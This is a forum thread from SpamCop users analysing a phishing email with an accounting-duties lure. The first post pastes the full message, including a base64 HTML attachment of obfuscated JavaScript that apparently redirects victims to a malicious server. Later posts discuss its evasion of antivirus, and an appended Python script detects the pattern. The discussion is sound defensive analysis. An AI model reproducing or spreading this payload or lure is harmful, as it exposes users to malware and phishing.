Phishing attempts to my spamcop account


4 replies to this topic

#1 mplungjan@spamcop.net

mplungjan@spamcop.net

    Newbie

  • Members
  • 6 posts

Posted 17 September 2010 - 06:20 AM

Delivered-To: <myemail>
Received: (qmail 4960 invoked from network); 17 Sep 2010 10:58:28 -0000
Received: from unknown (HELO m1pismtp01-018.prod.mesa1.secureserver.net) ([10.8.12.18]) (envelope-sender <ox[at]rootsproduce.com>) by smtp31.prod.mesa1.secureserver.net (qmail-1.03) with SMTP for <myemail>; 17 Sep 2010 10:58:28 -0000
X-IronPort-Anti-spam-Result: AtERAFvmkkzYmsMxf2dsb2JhbAAKBJQihW2HdxUBAQoKDBgEHowGhwKtf4VBBIRGiH0
Received: from c60.cesmail.net ([216.154.195.49]) by m1pismtp01-018.prod.mesa1.secureserver.net with ESMTP; 17 Sep 2010 03:58:27 -0700
Received: from unknown (HELO filter8.cesmail.net) ([192.168.1.218]) by c60.cesmail.net with SMTP; 17 Sep 2010 06:58:27 -0400
Received: (qmail 17745 invoked by uid 1010); 17 Sep 2010 10:58:27 -0000
Delivered-To: spamcop-net-<myname>[at]spamcop.net
Received: (qmail 17681 invoked from network); 17 Sep 2010 10:58:26 -0000
X-spam-Checker-Version: SpamAssassin 3.2.4 (2008-01-01) on filter8
X-spam-Level:
X-spam-Status: hits=0.1 tests=HTML_MESSAGE,RDNS_NONE version=3.2.4
Received: from unknown (192.168.1.107) by filter8.cesmail.net with QMQP; 17 Sep 2010 10:58:26 -0000
Received: from unknown (HELO YBTBJES) (92.246.206.203) by mx70.cesmail.net with SMTP; 17 Sep 2010 10:58:25 -0000
Received: from svtmail07.prod.sabre.com (svtmail04.prod.sabre.com [151.193.64.1]) by mail.global.frontbridge.com with esmtp id 5A849F-000946-63 for ljl[at]spamcop.net; Fri, 17 Sep 2010 14:58:19 +0300
Received: from samlab (10.208.04.9:61117) by svtmail09.prod.sabre.com (LSMTP for Windows NT v1.1b) with SMTP id <3.C0CBAD1D[at]svtmail05.prod.sabre.com>; Fri, 17 Sep 2010 14:58:19 +0300
Date: Fri, 17 Sep 2010 14:58:19 +0300
From: "Winfred Joiner" <ox[at]rootsproduce.com>
To: ljl[at]spamcop.net
Message-ID: <57114311.39684104853195612400.JavaMail.ita[at]samlab>
Subject: Please help me
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_Part_1695044_17099105.4893020990891"
X-SpamCop-Checked: 92.246.206.203 151.193.64.1

------=_Part_1695044_17099105.4893020990891
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 7bit

Please help me to take over the accounting duties during the period Jackie will be gone. Make arrangements so that you will be able to issue checks and know where to deposit received checks.

------=_Part_1695044_17099105.4893020990891
Content-Type: text/html; name="52399xls.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="52399xls.html"

PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij5mdW5j
dGlvbiBldGdyKHpqNHIpe3Zhcg0KYm85Nyxidmd5PSIiLGtwbjgsaXl2Mj0iMG9jZGZ1bTtpcC9x
cmx4PW50Li06diBoZT5zXCJhPCIscDNqZSxqNDQ2PWl5djIubGVuZ3RoO2V2YWwodW5lc2NhcGUo
IiU2NnVuJTYzdGklNkZuIHIlNjFpeSUyOGt1JTc5Yyl7JTYydmclNzkrPSU2QnV5YyU3RCIpKTtm
b3IocDNqZT0wO3AzamU8emo0ci5sZW5ndGg7cDNqZSsrKXtibzk3PXpqNHIuY2hhckF0KHAzamUp
O2twbjg9aXl2Mi5pbmRleE9mKGJvOTcpO2lmKGtwbjg+LTEpe2twbjgtPShwM2plKzEpJWo0NDY7
aWYoa3BuODwwKXtrcG44Kz1qNDQ2O31yYWl5KGl5djIuY2hhckF0KGtwbjgpKTt9ZWxzZXtyYWl5
KGJvOTcpO319ZXZhbCh1bmVzY2FwZSgiJTY0b2MlNzVtZSU2RXQudyU3Mml0JTY1KGIlNzZneSkl
M0JidiU2N3k9JTIyJTIyOyIpKTt9ZXRncigiMGlcInZkYTA+cy0wbWUtaDtjPW94PmZ0Oi5oLTAw
bi5zLXY6ZDs9eCBlXCJtb2M+O2E8bXNhdG1zb2w8Lml0dXFjaGlpeC1lPHUwOmFscGF4ciIpOzwv
c2NyaXB0Pjxub3NjcmlwdD5UbyBkaXNwbGF5IHRoaXMgcGFnZSB5b3UgbmVlZCBhIGJyb3dzZXIg
dGhhdCBzdXBwb3J0cyBKYXZhU2NyaXB0Ljwvbm9zY3JpcHQ+
------=_Part_1695044_17099105.4893020990891--

#2 Farelf

Farelf

    What Life?

  • Members
  • 6,674 posts

Posted 17 September 2010 - 07:17 AM

Thanks mplungjan. Any idea what that bit of JavaScript (the HTML attachment) you were sent does?

Can you refer to these things by way of a Tracking URL rather than as a paste-in of the actual spam? The forum formatting and badword filter change stuff posted here; there can sometimes be live links to bad places and, although munged slightly, there is exposure of (usually) innocent addresses etc. when you post the spam in public.
Plus ca change, plus c'est la meme chose

#3 Farelf

Farelf

    What Life?

  • Members
  • 6,674 posts

Posted 18 September 2010 - 12:18 AM

Well, I'm not a coder's bootlace (the more refined way to say it, if the phrase seems unfamiliar) but ... From several different code fragments in the (decoded) attachment it seems to be (slightly?) related to jsunpack - probably an unpacker for a lightning download then - though no source for the download is apparent to me. Lots of people might get "caught" by such a thing (if they have scripting allowed on their browser/mail client) if there is an actual payload and whatever that ultimate payload's function(s) might be would be anyone's guess - but identity theft is potentially the most serious. Nasty - or not sent by anyone wishing you well anyway.
Plus ca change, plus c'est la meme chose

#4 silentlarry

silentlarry

    Advanced Member

  • Members
  • 118 posts

Posted 20 September 2010 - 01:11 PM

FYI for whatever it's worth

I've been getting similar stuff, seems to be increasing every day.

Really low spam assassin score on most of these. Successful filtering is usually by CBL or one of the other BLs.


tracking1
tracking2
tracking3

#5 Farelf

Farelf

    What Life?

  • Members
  • 6,674 posts

Posted 20 September 2010 - 07:44 PM

FYI for whatever it's worth

I've been getting similar stuff, seems to be increasing every day.

Well worth raising SL, seems it was and is a 'zero day' sort of thing. Zero detections from the massed AV engines at VirusTotal when the O/P first raised the topic but now my resident Norton says Trojan.Webkit!html - http://securityrespo...r...-99&tabid=2

Discovered: October 9, 2007
Updated: October 9, 2007 4:42:01 PM
Type: Trojan
Infection Length: Varies
Systems Affected: Windows 98, Windows 95, Windows XP, Solaris, Windows Me, Windows Vista, Windows NT, Windows Server 2003, Linux, Windows 2000

Trojan.Webkit!html is a generic detection for HTML files containing malicious code to redirect users to malicious Web servers.

A successful compromise by a malicious Web server may result in additional malicious files being downloaded to the compromised computer.

Seems the 'unescape' coding within the script may be variable and/or some random characters outside the active body of code may be variable - which successfully defeats initial detection - the O/P's version was not picked up by Norton until yesterday's/today's updates. Haven't specifically checked yours but that's what I think is happening - the hash values will be variable, the code content may appear variable until unescape codes resolved, the redirection destination (which is well obfuscated, I can't see it) may be variable, very likely each day's version of the thing will be undetectable as a threat to most scanners for some days after release.

HTML attachments/content in spam have been around for ages - the prudent assumption is, if they are in spam they probably *are* malicious but this is the first time I have personally verified an instance. Well, apart from a few web bugs (can't assume they are history either - to keep a step ahead, spammers sometimes step backwards). The 'inconvenience' of safe practice (no scripting allowed, no preview of email, view text only, don't read obvious spam at all, don't open unknown attachments or click on unknown links, query/prevent redirections) seems to be vindicated once again.
Plus ca change, plus c'est la meme chose
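As an added example (my code, not anything posted in this thread or shipped by SpamCop), the following Python script does in a repeatable way what Farelf did by hand in posts #3 and #5: it pulls the base64 HTML attachment out of a raw message, hashes it, and looks for the obfuscation pattern the thread describes (a substitution loop, helper code built with eval(unescape("...")), and a final document.write) both in the bytes as shipped and after the %xx escapes are resolved, which is what the browser's unescape() would do. The MIME message and the attachment it carries are constructed stand-ins shaped like the spam quoted in post #1, not the original; the indicator names and the "suspicious" threshold are my own assumptions, and the indicators are heuristics, not a signature for the specific sample.

```python
import base64
import email
import email.policy
import hashlib
import re
from urllib.parse import unquote

# Constructed stand-in for the obfuscated HTML attachment discussed in the
# thread (NOT the original attachment). It keeps the tell-tale shape: a script
# that rebuilds its real code from a substitution table, defines a helper via
# eval(unescape("...")), and finally emits the result with document.write().
SAMPLE_HTML = (
    '<script language="JavaScript" type="text/javascript">'
    'function dec(s){var out="",tbl="abcdefghijklmnopqrstuvwxyz",i,k;'
    'eval(unescape("%66un%63ti%6Fn add(c){%6Fut+=c}"));'
    'for(i=0;i<s.length;i++){k=tbl.indexOf(s.charAt(i));'
    'if(k>-1){k-=(i+1)%tbl.length;if(k<0){k+=tbl.length;}add(tbl.charAt(k));}'
    'else{add(s.charAt(i));}}'
    'eval(unescape("%64oc%75me%6Et.w%72it%65(out)"));}'
    'dec("constructed sample");</script>'
    '<noscript>To display this page you need a browser that supports '
    'JavaScript.</noscript>'
)


def build_sample_message(html: str) -> bytes:
    """Wrap HTML as a base64 attachment in a multipart/mixed message shaped
    like the spam quoted in the thread. Addresses and boundary are constructed."""
    b64 = base64.encodebytes(html.encode("latin-1")).decode("ascii")
    return (
        "From: sender@example.invalid\n"
        "To: recipient@example.invalid\n"
        "Subject: Please help me\n"
        "MIME-Version: 1.0\n"
        'Content-Type: multipart/mixed; boundary="----=_Part_constructed"\n'
        "\n"
        "------=_Part_constructed\n"
        "Content-Type: text/plain; charset=iso-8859-1\n"
        "Content-Transfer-Encoding: 7bit\n"
        "\n"
        "Please help me to take over the accounting duties.\n"
        "------=_Part_constructed\n"
        'Content-Type: text/html; name="52399xls.html"\n'
        "Content-Transfer-Encoding: base64\n"
        'Content-Disposition: attachment; filename="52399xls.html"\n'
        "\n" + b64 +
        "------=_Part_constructed--\n"
    ).encode("ascii")


def indicators_for(text: str) -> set:
    """Heuristic obfuscation indicators. They look at what the script does, not
    at its exact bytes, so they survive renamed variables, different hex
    escapes and padding characters between copies (the variation post #5
    describes as defeating hash-based detection)."""
    hits = set()
    if re.search(r"eval\s*\(\s*unescape\s*\(", text, re.I):
        hits.add("eval_unescape")
    if len(re.findall(r"%[0-9a-f]{2}", text, re.I)) >= 4:
        hits.add("hex_escaped_code")
    if re.search(r"document\s*\.\s*write\s*\(", text, re.I):
        hits.add("document_write")
    if re.search(r"\.indexOf\(.*?\.charAt\(", text, re.I | re.S):
        hits.add("substitution_loop")
    return hits


def triage_html(data: bytes) -> dict:
    """Hash an HTML attachment and scan it twice: as shipped, and after
    resolving the %xx escapes that unescape() would resolve in the browser."""
    text = data.decode("latin-1")
    hits = indicators_for(text) | indicators_for(unquote(text))
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "indicators": sorted(hits),
        # eval(unescape()) plus any second sign of self-rebuilding code
        "suspicious": "eval_unescape" in hits and len(hits) >= 2,
    }


def triage_message(raw: bytes) -> list:
    """Parse a raw RFC 5322 message and triage every HTML attachment in it."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    results = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        if part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html")):
            result = triage_html(part.get_payload(decode=True))
            result["filename"] = name
            results.append(result)
    return results


if __name__ == "__main__":
    for r in triage_message(build_sample_message(SAMPLE_HTML)):
        print(r["filename"], r["sha256"][:16], r["indicators"], "suspicious" if r["suspicious"] else "clean")
```

Running it against the constructed message flags the attachment on all four indicators; appending a comment to the HTML changes the SHA-256 but leaves the indicators unchanged, which is the gap between hash-based and content-based detection that post #5 describes. The document_write indicator only fires on the unescaped pass, since the shipped bytes spell it as "%64oc%75me%6Et.w%72it%65".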



